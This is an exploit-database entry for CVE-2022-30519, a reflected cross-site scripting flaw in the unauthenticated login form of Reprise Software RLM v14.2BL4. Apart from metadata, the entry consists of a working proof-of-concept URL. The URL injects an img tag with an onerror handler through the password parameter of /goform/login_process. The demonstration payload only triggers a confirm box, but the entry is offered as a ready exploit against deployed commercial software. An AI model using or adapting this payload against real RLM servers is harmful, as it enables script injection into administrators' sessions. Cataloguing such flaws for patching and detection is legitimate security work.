Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)

Author: Mohammed A.Siledar
type: webapps
platform: windows
port: 
date_added: 2023-04-01  
date_updated: 2023-04-01  
verified: 0  
codes: CVE-2022-30519  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 51188.txt  

# Exploit Title:  Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)
# Exploit Author: Mohammed A.Siledar
# Author Company : reprisesoftware
# Version: rlm.v14.2BL4
# Vendor home page : https://reprisesoftware.com
# Software Link: https://www.reprisesoftware.com/license_admin_kits/rlm.v14.2BL4-x64_w3.admin.exe
# Authentication Required: No
# CVE : CVE-2022-30519
# Tested on: Windows 10

# Proof Of Concept:

http://localhost/goform/login_process?username=admin&password=admin%22%3E%3Cimg%20src=x%20onerror=confirm(123)%3E


Best Regards.